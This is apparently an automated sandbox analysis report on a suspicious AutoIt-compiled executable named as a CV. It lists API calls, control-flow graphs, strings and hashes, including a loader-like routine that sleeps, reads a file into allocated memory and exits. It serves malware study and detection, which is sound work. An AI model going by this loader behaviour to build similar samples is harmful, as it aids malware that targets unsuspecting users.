                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                                            • API String ID: 2955681530-2806939583
                                                                                            • Opcode ID: 8a94bfd1ceb007a5138ad03568203002ec64c47092de3a08b9c074fae11951df
                                                                                            • Instruction ID: 6b2765fd0ce786f8a61800645ee99f67e9d336b5fc49aa0569ec9b97df4624ee
                                                                                            • Opcode Fuzzy Hash: 8a94bfd1ceb007a5138ad03568203002ec64c47092de3a08b9c074fae11951df
                                                                                            • Instruction Fuzzy Hash: 1291AF72604245AFDB20EB54C952FDEB3E8BF94300F04482DF99997292DB70EA45CB92

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 000C3F86
                                                                                            • RegisterClassExW.USER32(00000030), ref: 000C3FB0
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C3FC1
                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000C3FDE
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C3FEE
                                                                                            • LoadIconW.USER32(000000A9), ref: 000C4004
                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C4013
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                            • API String ID: 2914291525-1005189915
                                                                                            • Opcode ID: 4268ef4e88df6a808a2d6f5ffc752ac9f21ad931440d76e2e5896f9d735a232d
                                                                                            • Instruction ID: caaacdb0d37c87c475ede157eefdd43240e3bc1f1387c9489c2357899c44986e
                                                                                            • Opcode Fuzzy Hash: 4268ef4e88df6a808a2d6f5ffc752ac9f21ad931440d76e2e5896f9d735a232d
                                                                                            • Instruction Fuzzy Hash: EB21F9B9D00318AFDF00DFA4EC49BCDBBB8FB09700F10421AF511A66A0E7B506858F91

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0010BDB4: __time64.LIBCMT ref: 0010BDBE
                                                                                              • Part of subcall function 000C4517: _fseek.LIBCMT ref: 000C452F
                                                                                            • __wsplitpath.LIBCMT ref: 0010C083
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscpy.LIBCMT ref: 0010C096
                                                                                            • _wcscat.LIBCMT ref: 0010C0A9
                                                                                            • __wsplitpath.LIBCMT ref: 0010C0CE
                                                                                            • _wcscat.LIBCMT ref: 0010C0E4
                                                                                            • _wcscat.LIBCMT ref: 0010C0F7
                                                                                            • _wcscmp.LIBCMT ref: 0010C03E
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C65D
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C670
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0010C2A1
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010C338
                                                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010C34E
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010C35F
                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010C371
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 2378138488-0
                                                                                            • Opcode ID: a0b9071d4841043831bdd50f12e722dbad7a9887d5c4f51ba736c3ad744d160c
                                                                                            • Instruction ID: f32724a3c9dcad6dca11f8447ee8f134a648862b717c42583c03ab981bbc31b3
                                                                                            • Opcode Fuzzy Hash: a0b9071d4841043831bdd50f12e722dbad7a9887d5c4f51ba736c3ad744d160c
                                                                                            • Instruction Fuzzy Hash: E2C13BB1A00219AFCF15DF95CC81EDEB7BDBF59300F1081AAF649E6152DB709A848F61

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 957 c3742-c3762 959 c3764-c3767 957->959 960 c37c2-c37c4 957->960 962 c37c8 959->962 963 c3769-c3770 959->963 960->959 961 c37c6 960->961 964 c37ab-c37b3 DefWindowProcW 961->964 965 c37ce-c37d1 962->965 966 131e00-131e2e call c2ff6 call de312 962->966 967 c382c-c3834 PostQuitMessage 963->967 968 c3776-c377b 963->968 969 c37b9-c37bf 964->969 970 c37f6-c381d SetTimer RegisterWindowMessageW 965->970 971 c37d3-c37d4 965->971 1004 131e33-131e3a 966->1004 975 c37f2-c37f4 967->975 973 131e88-131e9c call 104ddd 968->973 974 c3781-c3783 968->974 970->975 979 c381f-c382a CreatePopupMenu 970->979 976 131da3-131da6 971->976 977 c37da-c37ed KillTimer call c3847 call c390f 971->977 973->975 999 131ea2 973->999 980 c3789-c378e 974->980 981 c3836-c3840 call deb83 974->981 975->969 983 131da8-131daa 976->983 984 131ddc-131dfb MoveWindow 976->984 977->975 979->975 987 c3794-c3799 980->987 988 131e6d-131e74 980->988 991 c3845 981->991 992 131dcb-131dd7 SetFocus 983->992 993 131dac-131daf 983->993 984->975 997 c379f-c37a5 987->997 998 131e58-131e68 call 1055bd 987->998 988->964 995 131e7a-131e83 call fa5f3 988->995 991->975 992->975 993->997 1000 131db5-131dc6 call c2ff6 993->1000 995->964 997->964 997->1004 998->975 999->964 1000->975 1004->964 1005 131e40-131e53 call c3847 call c4ffc 1004->1005 1005->964
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 000C37B3
                                                                                            • KillTimer.USER32(?,00000001), ref: 000C37DD
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C3800
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C380B
                                                                                            • CreatePopupMenu.USER32 ref: 000C381F
                                                                                            • PostQuitMessage.USER32(00000000), ref: 000C382E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                            • String ID: TaskbarCreated
                                                                                            • API String ID: 129472671-2362178303
                                                                                            • Opcode ID: 0a2d70ad3cf4425ca3ad613327b6aecee2b1925fea5cb994f94a1c4be7b3fa0d
                                                                                            • Instruction ID: 5fef83c177c08be96e74b802ba8b10ce131e244a2cee8b8daf89ad8e501310b8
                                                                                            • Opcode Fuzzy Hash: 0a2d70ad3cf4425ca3ad613327b6aecee2b1925fea5cb994f94a1c4be7b3fa0d
                                                                                            • Instruction Fuzzy Hash: EB412CF6128245B7DB346B68ED4DFBE36D9F705301F00822DF902965A1CB609F819761

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 000C3E79
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 000C3E88
                                                                                            • LoadIconW.USER32(00000063), ref: 000C3E9E
                                                                                            • LoadIconW.USER32(000000A4), ref: 000C3EB0
                                                                                            • LoadIconW.USER32(000000A2), ref: 000C3EC2
                                                                                              • Part of subcall function 000C4024: LoadImageW.USER32(000C0000,00000063,00000001,00000010,00000010,00000000), ref: 000C4048
                                                                                            • RegisterClassExW.USER32(?), ref: 000C3F30
                                                                                              • Part of subcall function 000C3F53: GetSysColorBrush.USER32(0000000F), ref: 000C3F86
                                                                                              • Part of subcall function 000C3F53: RegisterClassExW.USER32(00000030), ref: 000C3FB0
                                                                                              • Part of subcall function 000C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C3FC1
                                                                                              • Part of subcall function 000C3F53: InitCommonControlsEx.COMCTL32(?), ref: 000C3FDE
                                                                                              • Part of subcall function 000C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C3FEE
                                                                                              • Part of subcall function 000C3F53: LoadIconW.USER32(000000A9), ref: 000C4004
                                                                                              • Part of subcall function 000C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C4013
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                            • String ID: #$0$AutoIt v3
                                                                                            • API String ID: 423443420-4155596026
                                                                                            • Opcode ID: fdcbe3b4e5b0e9094ebd53339f2e0555b6773248b3726b258a7c36db79e39796
                                                                                            • Instruction ID: 3775ea77b576e58c10d1a92890c03718e3373835de2b5ed3e270ee7cd6c49511
                                                                                            • Opcode Fuzzy Hash: fdcbe3b4e5b0e9094ebd53339f2e0555b6773248b3726b258a7c36db79e39796
                                                                                            • Instruction Fuzzy Hash: A9215CB5D00304BBCB10DFA9EC49A9DBFF9FB48714F10812AE614A76A0D3B546818F91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1021 1b26ca0-1b26d4e call 1b246e0 1024 1b26d55-1b26d7b call 1b27bb0 CreateFileW 1021->1024 1027 1b26d82-1b26d92 1024->1027 1028 1b26d7d 1024->1028 1033 1b26d94 1027->1033 1034 1b26d99-1b26db3 VirtualAlloc 1027->1034 1029 1b26ecd-1b26ed1 1028->1029 1031 1b26f13-1b26f16 1029->1031 1032 1b26ed3-1b26ed7 1029->1032 1035 1b26f19-1b26f20 1031->1035 1036 1b26ee3-1b26ee7 1032->1036 1037 1b26ed9-1b26edc 1032->1037 1033->1029 1040 1b26db5 1034->1040 1041 1b26dba-1b26dd1 ReadFile 1034->1041 1042 1b26f22-1b26f2d 1035->1042 1043 1b26f75-1b26f8a 1035->1043 1038 1b26ef7-1b26efb 1036->1038 1039 1b26ee9-1b26ef3 1036->1039 1037->1036 1046 1b26f0b 1038->1046 1047 1b26efd-1b26f07 1038->1047 1039->1038 1040->1029 1048 1b26dd3 1041->1048 1049 1b26dd8-1b26e18 VirtualAlloc 1041->1049 1050 1b26f31-1b26f3d 1042->1050 1051 1b26f2f 1042->1051 1044 1b26f9a-1b26fa2 1043->1044 1045 1b26f8c-1b26f97 VirtualFree 1043->1045 1045->1044 1046->1031 1047->1046 1048->1029 1052 1b26e1a 1049->1052 1053 1b26e1f-1b26e3a call 1b27e00 1049->1053 1054 1b26f51-1b26f5d 1050->1054 1055 1b26f3f-1b26f4f 1050->1055 1051->1043 1052->1029 1061 1b26e45-1b26e4f 1053->1061 1056 1b26f6a-1b26f70 1054->1056 1057 1b26f5f-1b26f68 1054->1057 1059 1b26f73 1055->1059 1056->1059 1057->1059 1059->1035 1062 1b26e82-1b26e96 call 1b27c10 1061->1062 1063 1b26e51-1b26e80 call 1b27e00 1061->1063 1069 1b26e9a-1b26e9e 1062->1069 1070 1b26e98 1062->1070 1063->1061 1071 1b26ea0-1b26ea4 CloseHandle 1069->1071 1072 1b26eaa-1b26eae 1069->1072 1070->1029 1071->1072 1073 1b26eb0-1b26ebb VirtualFree 1072->1073 1074 1b26ebe-1b26ec7 1072->1074 1073->1074 1074->1024 1074->1029
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01B26D71
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01B26F97
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileFreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 204039940-0
                                                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                            • Instruction ID: 9a197443183a59a72f910eaa8edc32f86deb9763f569c74e528635209399c534
                                                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                            • Instruction Fuzzy Hash: 01A10974E00219EBDF18DFA4C894BEEBBB5FF48304F108599E605BB280D7759A85CB94

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1130 c49fb-c4a25 call cbcce RegOpenKeyExW 1133 c4a2b-c4a2f 1130->1133 1134 1341cc-1341e3 RegQueryValueExW 1130->1134 1135 134246-13424f RegCloseKey 1134->1135 1136 1341e5-134222 call df4ea call c47b7 RegQueryValueExW 1134->1136 1141 134224-13423b call c6a63 1136->1141 1142 13423d-134245 call c47e2 1136->1142 1141->1142 1142->1135
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000C4A1D
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001341DB
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0013421A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00134249
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$CloseOpen
                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                            • API String ID: 1586453840-614718249
                                                                                            • Opcode ID: a1a18eae4fff0c91402aa38470a93efae6decb2b0b479dc899fc38b366d43a70
                                                                                            • Instruction ID: 2b06ea8928e649b523aaab67d9aefc9447df6f031315639c994bed81f2f9feac
                                                                                            • Opcode Fuzzy Hash: a1a18eae4fff0c91402aa38470a93efae6decb2b0b479dc899fc38b366d43a70
                                                                                            • Instruction Fuzzy Hash: E2115C75A00108BFEB10ABA4DD86EEF7BACEB05344F000059B506E71A1EB70AE45DB50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1157 c36b8-c3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C36E6
                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3707
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C371B
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C3724
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateShow
                                                                                            • String ID: AutoIt v3$edit
                                                                                            • API String ID: 1584632944-3779509399
                                                                                            • Opcode ID: 1abc1121bd0d52765902776a0af128f600fe33a02428cf86414d6c766b25cc4d
                                                                                            • Instruction ID: a2f616d169cdd6b0114ec4393f5b78c99dbb5f85b20df064d2d4ce3ccd34587a
                                                                                            • Opcode Fuzzy Hash: 1abc1121bd0d52765902776a0af128f600fe33a02428cf86414d6c766b25cc4d
                                                                                            • Instruction Fuzzy Hash: CDF0DA765402D07AEB315B57AC08E673E7DE7C7F25B00001ABA04A65B0C66509D6EBB1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1262 1b26a90-1b26b9e call 1b246e0 call 1b26980 CreateFileW 1269 1b26ba0 1262->1269 1270 1b26ba5-1b26bb5 1262->1270 1271 1b26c55-1b26c5a 1269->1271 1273 1b26bb7 1270->1273 1274 1b26bbc-1b26bd6 VirtualAlloc 1270->1274 1273->1271 1275 1b26bda-1b26bf1 ReadFile 1274->1275 1276 1b26bd8 1274->1276 1277 1b26bf3 1275->1277 1278 1b26bf5-1b26c2f call 1b269c0 call 1b25980 1275->1278 1276->1271 1277->1271 1283 1b26c31-1b26c46 call 1b26a10 1278->1283 1284 1b26c4b-1b26c53 ExitProcess 1278->1284 1283->1284 1284->1271
                                                                                            APIs
                                                                                              • Part of subcall function 01B26980: Sleep.KERNELBASE(000001F4), ref: 01B26991
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01B26B94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileSleep
                                                                                            • String ID: SJZB1TEL46C
                                                                                            • API String ID: 2694422964-318147440
                                                                                            • Opcode ID: 647ad0aba57a413c085007bfc876b6e541765bdf607e89ef809317b97da8e0ea
                                                                                            • Instruction ID: bbd03f14970548cd56096934fc6a93f807145d5ab49fe49f1cfcf4da239f0d8e
                                                                                            • Opcode Fuzzy Hash: 647ad0aba57a413c085007bfc876b6e541765bdf607e89ef809317b97da8e0ea
                                                                                            • Instruction Fuzzy Hash: E7518331D14259EBEF15DBA4C919BEEBB78EF48300F004199E609BB2C0D7751B49CBA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1286 c51af-c51c5 1287 c51cb-c51e0 call c6b0f 1286->1287 1288 c52a2-c52a6 1286->1288 1291 133ca1-133cb0 LoadStringW 1287->1291 1292 c51e6-c5206 call c6a63 1287->1292 1295 133cbb-133cd3 call c510d call c4db1 1291->1295 1292->1295 1296 c520c-c5210 1292->1296 1305 c5220-c529d call e0d50 call c50e6 call e0d23 Shell_NotifyIconW call ccb37 1295->1305 1308 133cd9-133cf7 call c518c call c4db1 call c518c 1295->1308 1298 c5216-c521b call c510d 1296->1298 1299 c52a7-c52b0 call c6eed 1296->1299 1298->1305 1299->1305 1305->1288 1308->1305
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000C522F
                                                                                            • _wcscpy.LIBCMT ref: 000C5283
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5293
                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00133CB0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                            • String ID: Line:
                                                                                            • API String ID: 1053898822-1585850449
                                                                                            • Opcode ID: bfd0ad1b221373173bac2c8a371429cad9b13b8a9685c9aa53096ab651cb5284
                                                                                            • Instruction ID: 04e903a8592609c4cbd8f4c8f66a79a7b69bb5dc82d99445457bab44a4f818e6
                                                                                            • Opcode Fuzzy Hash: bfd0ad1b221373173bac2c8a371429cad9b13b8a9685c9aa53096ab651cb5284
                                                                                            • Instruction Fuzzy Hash: 5231AF76008740AFD330EB60EC46FDE77ECAB45310F04451EF599925A2EB70A6C9CB96
                                                                                            APIs
                                                                                              • Part of subcall function 000C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000C39FE,?,00000001), ref: 000C41DB
                                                                                            • _free.LIBCMT ref: 001336B7
                                                                                            • _free.LIBCMT ref: 001336FE
                                                                                              • Part of subcall function 000CC833: __wsplitpath.LIBCMT ref: 000CC93E
                                                                                              • Part of subcall function 000CC833: _wcscpy.LIBCMT ref: 000CC953
                                                                                              • Part of subcall function 000CC833: _wcscat.LIBCMT ref: 000CC968
                                                                                              • Part of subcall function 000CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000CC978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                            • API String ID: 805182592-1757145024
                                                                                            • Opcode ID: 388a591b04d989729e5df7f3b6122ce58ae76f4dc5af4cd302eeda40a4c81b42
                                                                                            • Instruction ID: c417dfe92eb2e2fa2253ecbae5d13674bca879b7f894a35f76e1f969bde09dfe
                                                                                            • Opcode Fuzzy Hash: 388a591b04d989729e5df7f3b6122ce58ae76f4dc5af4cd302eeda40a4c81b42
                                                                                            • Instruction Fuzzy Hash: F5917071910219AFDF04EFA4CC92DEEB7B4BF19310F14442EF866AB292DB709A45CB54
                                                                                            APIs
                                                                                              • Part of subcall function 000C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00181148,?,000C61FF,?,00000000,00000001,00000000), ref: 000C5392
                                                                                              • Part of subcall function 000C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 000C4A1D
                                                                                            • _wcscat.LIBCMT ref: 00132D80
                                                                                            • _wcscat.LIBCMT ref: 00132DB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
